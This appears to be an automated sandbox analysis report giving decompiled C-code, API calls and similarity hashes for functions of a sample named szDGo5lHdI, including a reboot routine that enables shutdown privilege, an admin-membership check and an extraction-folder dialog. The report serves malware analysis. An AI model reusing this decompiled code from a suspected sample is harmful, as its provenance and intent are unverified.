                                                                                                                                                                                                                                    • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                                                    • String ID: "$"$:$RegServer
                                                                                                                                                                                                                                    • API String ID: 1203814774-25366791
                                                                                                                                                                                                                                    • Opcode ID: 12c5ede7d68d4361fc545a2339da1b738b8745ab16626e3584918b88019fd5b3
                                                                                                                                                                                                                                    • Instruction ID: 3f853014ee877d2515ec6058bf9da6422bf58f592a71eae056d1935db408f189
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 12c5ede7d68d4361fc545a2339da1b738b8745ab16626e3584918b88019fd5b3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B0D11771A04A455AEB358B388D487BB3B61EB16304F1440BBD8CAF62D1D67C8E82CF4D
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00401F90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94shutdownCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 60%
                                                                                                                                                                                                                                    			E00401F90(signed int __ecx, void* __edi, void* __esi) {
				signed int _v8;
				int _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* _v28;
				void* __ebx;
				signed int _t13;
				int _t21;
				void* _t25;
				int _t28;
				signed char _t30;
				void* _t38;
				void* _t40;
				void* _t41;
				signed int _t46;

				_t41 = __esi;
				_t38 = __edi;
				_t30 = __ecx;
				if((__ecx & 0x00000002) != 0) {
					L12:
					if((_t30 & 0x00000004) != 0) {
						L14:
						if( *0x409a40 != 0) {
							_pop(_t30);
							_t44 = _t46;
							_t13 =  *0x408004; // 0x8f135e3b
							_v8 = _t13 ^ _t46;
							_push(_t38);
							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
								_v24.PrivilegeCount = 1;
								_v12 = 2;
								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
								CloseHandle(_v28);
								_t41 = _t41;
								_push(0);
								if(_t21 != 0) {
									if(ExitWindowsEx(2, ??) != 0) {
										_t25 = 1;
									} else {
										_t37 = 0x4f7;
										goto L3;
									}
								} else {
									_t37 = 0x4f6;
									goto L4;
								}
							} else {
								_t37 = 0x4f5;
								L3:
								_push(0);
								L4:
								_push(0x10);
								_push(0);
								_push(0);
								E004044B9(0, _t37);
								_t25 = 0;
							}
							_pop(_t40);
							return E00406CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
						} else {
							_t28 = ExitWindowsEx(2, 0);
							goto L16;
						}
					} else {
						_t37 = 0x522;
						_t28 = E004044B9(0, 0x522, 0x401140, 0, 0x40, 4);
						if(_t28 != 6) {
							goto L16;
						} else {
							goto L14;
						}
					}
				} else {
					__eax = E00401EA7(__ecx);
					if(__eax != 2) {
						L16:
						return _t28;
					} else {
						goto L12;
					}
				}
			}

















                                                                                                                                                                                                                                    0x00401f90
                                                                                                                                                                                                                                    0x00401f90
                                                                                                                                                                                                                                    0x00401f93
                                                                                                                                                                                                                                    0x00401f98
                                                                                                                                                                                                                                    0x00401fa4
                                                                                                                                                                                                                                    0x00401fa7
                                                                                                                                                                                                                                    0x00401fc5
                                                                                                                                                                                                                                    0x00401fcd
                                                                                                                                                                                                                                    0x00401fdb
                                                                                                                                                                                                                                    0x00401ee5
                                                                                                                                                                                                                                    0x00401eea
                                                                                                                                                                                                                                    0x00401ef1
                                                                                                                                                                                                                                    0x00401ef4
                                                                                                                                                                                                                                    0x00401f0c
                                                                                                                                                                                                                                    0x00401f2e
                                                                                                                                                                                                                                    0x00401f3a
                                                                                                                                                                                                                                    0x00401f46
                                                                                                                                                                                                                                    0x00401f4d
                                                                                                                                                                                                                                    0x00401f58
                                                                                                                                                                                                                                    0x00401f60
                                                                                                                                                                                                                                    0x00401f61
                                                                                                                                                                                                                                    0x00401f62
                                                                                                                                                                                                                                    0x00401f75
                                                                                                                                                                                                                                    0x00401f80
                                                                                                                                                                                                                                    0x00401f77
                                                                                                                                                                                                                                    0x00401f77
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401f77
                                                                                                                                                                                                                                    0x00401f64
                                                                                                                                                                                                                                    0x00401f64
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401f64
                                                                                                                                                                                                                                    0x00401f0e
                                                                                                                                                                                                                                    0x00401f0e
                                                                                                                                                                                                                                    0x00401f13
                                                                                                                                                                                                                                    0x00401f13
                                                                                                                                                                                                                                    0x00401f14
                                                                                                                                                                                                                                    0x00401f14
                                                                                                                                                                                                                                    0x00401f16
                                                                                                                                                                                                                                    0x00401f17
                                                                                                                                                                                                                                    0x00401f1a
                                                                                                                                                                                                                                    0x00401f1f
                                                                                                                                                                                                                                    0x00401f1f
                                                                                                                                                                                                                                    0x00401f86
                                                                                                                                                                                                                                    0x00401f8f
                                                                                                                                                                                                                                    0x00401fcf
                                                                                                                                                                                                                                    0x00401fd3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401fd3
                                                                                                                                                                                                                                    0x00401fa9
                                                                                                                                                                                                                                    0x00401fb4
                                                                                                                                                                                                                                    0x00401fbb
                                                                                                                                                                                                                                    0x00401fc3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401fc3
                                                                                                                                                                                                                                    0x00401f9a
                                                                                                                                                                                                                                    0x00401f9a
                                                                                                                                                                                                                                    0x00401fa2
                                                                                                                                                                                                                                    0x00401fd9
                                                                                                                                                                                                                                    0x00401fda
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401fa2

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00401EFB
                                                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00401F02
                                                                                                                                                                                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 00401FD3
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                                                    • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                    • API String ID: 2795981589-3733053543
                                                                                                                                                                                                                                    • Opcode ID: a0f9794e17a2a2020f6724e084c01d69b3cf6ca5b21d9c9fc784dfd5cae79e59
                                                                                                                                                                                                                                    • Instruction ID: 05ee149af66cfd38363aee8e227656f8d8a40696282e74b864cdd5f9a16ea6ab
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a0f9794e17a2a2020f6724e084c01d69b3cf6ca5b21d9c9fc784dfd5cae79e59
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 972176B1A402066ADB205BA19D4AF7F76B8EBC5714F10003AFB06F61E1D77D8811966E
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 004017EE Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 71librarymemoryloaderCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 57%
                                                                                                                                                                                                                                    			E004017EE(intOrPtr* __ecx) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				_Unknown_base(*)()* _v20;
				void* _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t14;
				_Unknown_base(*)()* _t20;
				long _t28;
				void* _t35;
				struct HINSTANCE__* _t36;
				signed int _t38;
				intOrPtr* _t39;

				_t14 =  *0x408004; // 0x8f135e3b
				_v8 = _t14 ^ _t38;
				_v12 = 0x500;
				_t37 = __ecx;
				_v16.Value = 0;
				_v28 = __ecx;
				_t28 = 0;
				_t36 = LoadLibraryA("advapi32.dll");
				if(_t36 != 0) {
					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
					_v20 = _t20;
					if(_t20 != 0) {
						 *_t37 = 0;
						_t28 = 1;
						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
							_t37 = _t39;
							 *0x40a288(0, _v24, _v28);
							_v20();
							if(_t39 != _t39) {
								asm("int 0x29");
							}
							FreeSid(_v24);
						}
					}
					FreeLibrary(_t36);
				}
				return E00406CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
			}



















                                                                                                                                                                                                                                    0x004017f6
                                                                                                                                                                                                                                    0x004017fd
                                                                                                                                                                                                                                    0x00401805
                                                                                                                                                                                                                                    0x0040180b
                                                                                                                                                                                                                                    0x0040180d
                                                                                                                                                                                                                                    0x00401815
                                                                                                                                                                                                                                    0x00401818
                                                                                                                                                                                                                                    0x00401820
                                                                                                                                                                                                                                    0x00401824
                                                                                                                                                                                                                                    0x0040182c
                                                                                                                                                                                                                                    0x00401832
                                                                                                                                                                                                                                    0x00401837
                                                                                                                                                                                                                                    0x00401851
                                                                                                                                                                                                                                    0x00401854
                                                                                                                                                                                                                                    0x0040185d
                                                                                                                                                                                                                                    0x00401862
                                                                                                                                                                                                                                    0x0040186c
                                                                                                                                                                                                                                    0x00401872
                                                                                                                                                                                                                                    0x00401877
                                                                                                                                                                                                                                    0x0040187e
                                                                                                                                                                                                                                    0x0040187e
                                                                                                                                                                                                                                    0x00401883
                                                                                                                                                                                                                                    0x00401883
                                                                                                                                                                                                                                    0x0040185d
                                                                                                                                                                                                                                    0x0040188a
                                                                                                                                                                                                                                    0x0040188a
                                                                                                                                                                                                                                    0x004018a2

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,004018DD), ref: 0040181A
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0040182C
                                                                                                                                                                                                                                    • AllocateAndInitializeSid.ADVAPI32(004018DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,004018DD), ref: 00401855
                                                                                                                                                                                                                                    • FreeSid.ADVAPI32(?,?,?,?,004018DD), ref: 00401883
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,004018DD), ref: 0040188A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                                                    • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                                                    • API String ID: 4204503880-1888249752
                                                                                                                                                                                                                                    • Opcode ID: b6eebe71e7e9a4a03eb5822c34af0d440ca51bd5d564aa7407fe33a5010988da
                                                                                                                                                                                                                                    • Instruction ID: 1bd3692ccccaa6d7600f9d0fef09d9c741b671f303ea2036aeae9e10c16a3b59
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6eebe71e7e9a4a03eb5822c34af0d440ca51bd5d564aa7407fe33a5010988da
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 35119631E00309ABDB14AFA4DD49ABFBB78EF48704F10417AFA01F2390DA748D148B99
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00406CF0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 13COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E00406CF0(char _a4) {

				SetUnhandledExceptionFilter(0);
				_t1 =  &_a4; // 0x406e26
				UnhandledExceptionFilter( *_t1);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



                                                                                                                                                                                                                                    0x00406cf7
                                                                                                                                                                                                                                    0x00406cfd
                                                                                                                                                                                                                                    0x00406d00
                                                                                                                                                                                                                                    0x00406d19

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00406E26,00401000), ref: 00406CF7
                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(&n@,?,00406E26,00401000), ref: 00406D00
                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409,?,00406E26,00401000), ref: 00406D0B
                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,00406E26,00401000), ref: 00406D12
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                    • String ID: &n@
                                                                                                                                                                                                                                    • API String ID: 3231755760-1310975225
                                                                                                                                                                                                                                    • Opcode ID: 22c3889b8df8b4eddd8845cfc6315da698cd09f06ff32b4e0fededf4a1367697
                                                                                                                                                                                                                                    • Instruction ID: 8cb3f13b78dd38f3b5ff2bea80fcfbd25beb2721d0077c0a29712bb6dc75ce69
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 22c3889b8df8b4eddd8845cfc6315da698cd09f06ff32b4e0fededf4a1367697
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 87D0C932000308BBDB002BE1EE0CE593F28EB48212F444020F719AA020CA3244618B5B
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00407155 Relevance: 7.6, APIs: 5, Instructions: 51timethreadCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E00407155() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t23;
				signed int _t36;
				signed int _t37;
				signed int _t39;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t23 =  *0x408004; // 0x8f135e3b
				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentProcessId();
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = GetTickCount() ^ _v8 ^  &_v8;
					QueryPerformanceCounter( &_v24);
					_t36 = _v20 ^ _v24.LowPart ^ _v8;
					_t39 = _t36;
					if(_t36 == 0xbb40e64e || ( *0x408004 & 0xffff0000) == 0) {
						_t36 = 0xbb40e64f;
						_t39 = 0xbb40e64f;
					}
					 *0x408004 = _t39;
				}
				_t37 =  !_t36;
				 *0x408008 = _t37;
				return _t37;
			}











                                                                                                                                                                                                                                    0x0040715d
                                                                                                                                                                                                                                    0x00407161
                                                                                                                                                                                                                                    0x00407165
                                                                                                                                                                                                                                    0x00407178
                                                                                                                                                                                                                                    0x00407182
                                                                                                                                                                                                                                    0x0040718e
                                                                                                                                                                                                                                    0x00407197
                                                                                                                                                                                                                                    0x004071a0
                                                                                                                                                                                                                                    0x004071b1
                                                                                                                                                                                                                                    0x004071b8
                                                                                                                                                                                                                                    0x004071c4
                                                                                                                                                                                                                                    0x004071c7
                                                                                                                                                                                                                                    0x004071cb
                                                                                                                                                                                                                                    0x004071d5
                                                                                                                                                                                                                                    0x004071da
                                                                                                                                                                                                                                    0x004071da
                                                                                                                                                                                                                                    0x004071dc
                                                                                                                                                                                                                                    0x004071dc
                                                                                                                                                                                                                                    0x004071e2
                                                                                                                                                                                                                                    0x004071e5
                                                                                                                                                                                                                                    0x004071ee

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00407182
                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00407191
                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0040719A
                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 004071A3
                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 004071B8
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1445889803-0
                                                                                                                                                                                                                                    • Opcode ID: 73efb9c50b0bf3b317bcf728cc34354e7744d0be7b20c68d67c6a204e722458a
                                                                                                                                                                                                                                    • Instruction ID: bfdbf58dd1f09331b2ef62520d31486fb2a653da5464fc683e2cb64336e098ce
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 73efb9c50b0bf3b317bcf728cc34354e7744d0be7b20c68d67c6a204e722458a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF112871D012089BCB10DBB8DB48A9EB7F4EB08314F65486AD801EB250EA349E148B49
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00406F40 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E00406F40() {

				SetUnhandledExceptionFilter(E00406EF0);
				return 0;
			}



                                                                                                                                                                                                                                    0x00406f45
                                                                                                                                                                                                                                    0x00406f4d

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00006EF0), ref: 00406F45
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                                                                                                    • Opcode ID: 5af5f0cd64cddb50deb71555ddeccd90c44a21652ec31b6c76dfa555816b737e
                                                                                                                                                                                                                                    • Instruction ID: 378a529128b3a7e3d1065d46846c981e64e6a00043b7090dbb000319764bf95a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5af5f0cd64cddb50deb71555ddeccd90c44a21652ec31b6c76dfa555816b737e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DD90027425130047D6101B70DE1991975A15B4D602B925475A012E84D5DB744060659A
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 069020A3 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.447521600.0000000006902000.00000040.00000020.00020000.00000000.sdmp, Offset: 06902000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6902000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                    • Instruction ID: 0322fd71d05bdf4ab1a9c93562562e6c37cbdd28eab3d9ea3274383c2ce677e2
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6011A172340200AFE794DF55DCD4FA673EAEB89320B298065ED08CB756D676ED42C760
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00403210 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 188windowCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 76%
                                                                                                                                                                                                                                    			E00403210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* __edi;
				void* _t6;
				void* _t10;
				int _t20;
				int _t21;
				int _t23;
				char _t24;
				long _t25;
				int _t27;
				int _t30;
				void* _t32;
				int _t33;
				int _t34;
				int _t37;
				int _t38;
				int _t39;
				void* _t42;
				void* _t46;
				CHAR* _t49;
				void* _t58;
				void* _t63;
				struct HWND__* _t64;

				_t64 = _a4;
				_t6 = _a8 - 0x10;
				if(_t6 == 0) {
					_push(0);
					L38:
					EndDialog(_t64, ??);
					L39:
					__eflags = 1;
					return 1;
				}
				_t42 = 1;
				_t10 = _t6 - 0x100;
				if(_t10 == 0) {
					E004043D0(_t64, GetDesktopWindow());
					SetWindowTextA(_t64, "doza2");
					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
					__eflags =  *0x409a40 - _t42; // 0x3
					if(__eflags == 0) {
						EnableWindow(GetDlgItem(_t64, 0x836), 0);
					}
					L36:
					return _t42;
				}
				if(_t10 == _t42) {
					_t20 = _a12 - 1;
					__eflags = _t20;
					if(_t20 == 0) {
						_t21 = GetDlgItemTextA(_t64, 0x835, 0x4091e4, 0x104);
						__eflags = _t21;
						if(_t21 == 0) {
							L32:
							_t58 = 0x4bf;
							_push(0);
							_push(0x10);
							_push(0);
							_push(0);
							L25:
							E004044B9(_t64, _t58);
							goto L39;
						}
						_t49 = 0x4091e4;
						do {
							_t23 =  *_t49;
							_t49 =  &(_t49[1]);
							__eflags = _t23;
						} while (_t23 != 0);
						__eflags = _t49 - 0x4091e5 - 3;
						if(_t49 - 0x4091e5 < 3) {
							goto L32;
						}
						_t24 =  *0x4091e5; // 0x3a
						__eflags = _t24 - 0x3a;
						if(_t24 == 0x3a) {
							L21:
							_t25 = GetFileAttributesA(0x4091e4);
							__eflags = _t25 - 0xffffffff;
							if(_t25 != 0xffffffff) {
								L26:
								E0040658A(0x4091e4, 0x104, 0x401140);
								_t27 = E004058C8(0x4091e4);
								__eflags = _t27;
								if(_t27 != 0) {
									__eflags =  *0x4091e4 - 0x5c;
									if( *0x4091e4 != 0x5c) {
										L30:
										_t30 = E0040597D(0x4091e4, 1, _t64, 1);
										__eflags = _t30;
										if(_t30 == 0) {
											L35:
											_t42 = 1;
											__eflags = 1;
											goto L36;
										}
										L31:
										_t42 = 1;
										EndDialog(_t64, 1);
										goto L36;
									}
									__eflags =  *0x4091e5 - 0x5c;
									if( *0x4091e5 == 0x5c) {
										goto L31;
									}
									goto L30;
								}
								_push(0);
								_push(0x10);
								_push(0);
								_push(0);
								_t58 = 0x4be;
								goto L25;
							}
							_t32 = E004044B9(_t64, 0x54a, 0x4091e4, 0, 0x20, 4);
							__eflags = _t32 - 6;
							if(_t32 != 6) {
								goto L35;
							}
							_t33 = CreateDirectoryA(0x4091e4, 0);
							__eflags = _t33;
							if(_t33 != 0) {
								goto L26;
							}
							_push(0);
							_push(0x10);
							_push(0);
							_push(0x4091e4);
							_t58 = 0x4cb;
							goto L25;
						}
						__eflags =  *0x4091e4 - 0x5c;
						if( *0x4091e4 != 0x5c) {
							goto L32;
						}
						__eflags = _t24 - 0x5c;
						if(_t24 != 0x5c) {
							goto L32;
						}
						goto L21;
					}
					_t34 = _t20 - 1;
					__eflags = _t34;
					if(_t34 == 0) {
						EndDialog(_t64, 0);
						 *0x409124 = 0x800704c7;
						goto L39;
					}
					__eflags = _t34 != 0x834;
					if(_t34 != 0x834) {
						goto L36;
					}
					_t37 = LoadStringA( *0x409a3c, 0x3e8, 0x408598, 0x200);
					__eflags = _t37;
					if(_t37 != 0) {
						_t38 = E00404224(_t64, _t46, _t46);
						__eflags = _t38;
						if(_t38 == 0) {
							goto L36;
						}
						_t39 = SetDlgItemTextA(_t64, 0x835, 0x4087a0);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L36;
						}
						_t63 = 0x4c0;
						L9:
						E004044B9(_t64, _t63, 0, 0, 0x10, 0);
						_push(0);
						goto L38;
					}
					_t63 = 0x4b1;
					goto L9;
				}
				return 0;
			}

























                                                                                                                                                                                                                                    0x0040321b
                                                                                                                                                                                                                                    0x0040321e
                                                                                                                                                                                                                                    0x00403221
                                                                                                                                                                                                                                    0x0040343c
                                                                                                                                                                                                                                    0x0040343e
                                                                                                                                                                                                                                    0x0040343f
                                                                                                                                                                                                                                    0x00403445
                                                                                                                                                                                                                                    0x00403447
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403447
                                                                                                                                                                                                                                    0x00403229
                                                                                                                                                                                                                                    0x0040322a
                                                                                                                                                                                                                                    0x0040322f
                                                                                                                                                                                                                                    0x004033ec
                                                                                                                                                                                                                                    0x004033f7
                                                                                                                                                                                                                                    0x00403410
                                                                                                                                                                                                                                    0x00403416
                                                                                                                                                                                                                                    0x0040341d
                                                                                                                                                                                                                                    0x0040342d
                                                                                                                                                                                                                                    0x0040342d
                                                                                                                                                                                                                                    0x00403438
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403438
                                                                                                                                                                                                                                    0x00403237
                                                                                                                                                                                                                                    0x00403243
                                                                                                                                                                                                                                    0x00403243
                                                                                                                                                                                                                                    0x00403246
                                                                                                                                                                                                                                    0x004032ee
                                                                                                                                                                                                                                    0x004032f4
                                                                                                                                                                                                                                    0x004032f6
                                                                                                                                                                                                                                    0x004033d4
                                                                                                                                                                                                                                    0x004033d6
                                                                                                                                                                                                                                    0x004033db
                                                                                                                                                                                                                                    0x004033dc
                                                                                                                                                                                                                                    0x004033de
                                                                                                                                                                                                                                    0x004033df
                                                                                                                                                                                                                                    0x00403370
                                                                                                                                                                                                                                    0x00403372
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403372
                                                                                                                                                                                                                                    0x004032fc
                                                                                                                                                                                                                                    0x00403301
                                                                                                                                                                                                                                    0x00403301
                                                                                                                                                                                                                                    0x00403303
                                                                                                                                                                                                                                    0x00403304
                                                                                                                                                                                                                                    0x00403304
                                                                                                                                                                                                                                    0x0040330a
                                                                                                                                                                                                                                    0x0040330d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403313
                                                                                                                                                                                                                                    0x00403318
                                                                                                                                                                                                                                    0x0040331a
                                                                                                                                                                                                                                    0x00403331
                                                                                                                                                                                                                                    0x00403332
                                                                                                                                                                                                                                    0x0040333a
                                                                                                                                                                                                                                    0x0040333d
                                                                                                                                                                                                                                    0x0040337c
                                                                                                                                                                                                                                    0x00403388
                                                                                                                                                                                                                                    0x0040338f
                                                                                                                                                                                                                                    0x00403394
                                                                                                                                                                                                                                    0x00403396
                                                                                                                                                                                                                                    0x004033a4
                                                                                                                                                                                                                                    0x004033ab
                                                                                                                                                                                                                                    0x004033b6
                                                                                                                                                                                                                                    0x004033be
